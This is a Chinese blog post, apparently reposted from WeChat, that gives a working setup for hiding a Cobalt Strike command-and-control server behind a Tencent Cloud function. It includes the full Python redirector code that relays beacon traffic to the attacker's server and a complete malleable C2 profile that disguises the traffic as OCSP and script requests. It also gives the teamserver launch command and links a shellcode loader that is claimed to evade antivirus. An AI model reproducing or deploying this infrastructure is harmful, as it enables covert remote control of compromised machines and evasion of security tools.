前言
近年来随着国内对安全的重视,一些高端的攻击方式也出现在安全人员的视线,本文介绍一种免杀+C2(command&control)的攻击方法。
(脚本小子的自我日记)
C2的配置
本文使用腾讯云,云函数实现隐藏真实IP,我们找到腾讯云的云函数,开通这里就不说了,因为我已经开通过了,我们在创建好的云函数内
输入我们的代码
# -*- coding: utf8 -*-# -*- coding: utf8 -*-import json,base64,requestsdef main_handler(event,context):C2 = 'http://你的服务器IP'path = event['path']ip = event['requestContext']['sourceIp']headers = event['headers']headers['X-Forwarded-For'] = ipprint(event)if event['httpMethod'] == 'GET':resp = requests.get(C2+path,headers=headers,verify=False)else:resp = requests.post(C2+path,data=event['body'],headers=headers,verify=False)print(resp.headers)print(resp.content)response={"isBase64Encoded":True,"statusCode":resp.status_code,"headers":dict(resp.headers),"body":str(base64.b64encode(resp.content))[2:-1]}return response
点击触发管理
点击创建触发器
配置如图
点击API服务名
因为我已经是建立好了的,应该是默认就有的(并不清楚了有问题私信我吧)
点击API的名字
点击这里的编辑
配置成如图的
然后保存
然后发布
这里配置完,我们去CS(cobalt strike)里面创建一个配置文件
vi c2.profileset sample_name "t";set sleeptime "3000";set jitter "0";set maxdns "255";set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";http-get {set uri "/api/x";client {header "Accept" "*/*";metadata {base64;prepend "SESSIONID=";header "Cookie";}}server {header "Content-Type" "application/ocsp-response";header "content-transfer-encoding" "binary";header "Server" "Nodejs";output {base64;print;}}}http-stager {set uri_x86 "/vue.min.js";set uri_x64 "/bootstrap-2.min.js";}http-post {set uri "/api/y";client {header "Accept" "*/*";id {base64;prepend "JSESSION=";header "Cookie";}output {base64;print;}}server {header "Content-Type" "application/ocsp-response";header "content-transfer-encoding" "binary";header "Connection" "keep-alive";output {base64;print;}}}
按照这个配置启动CS
./teamserver 你的IP 密码 配置文件名启动后我们创建一个监听器,这里需要你80结尾的域名
这里的HTTP HOSTS 需要把前面的http:// 和后面的:80去掉即可
配置成这样就OK了
这里我们看一下效果
我们查询IP归属
我的服务器的真实IP是阿里云的
免杀
这里使用的是加载器,这里推一下作者的公众号。
这个是GIthub的项目地址,使用说明已经有了,亲测可过火绒
https://github.com/Axx8/ShellCode_Loader
原文始发于微信公众号(H1笔记):免杀+C2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论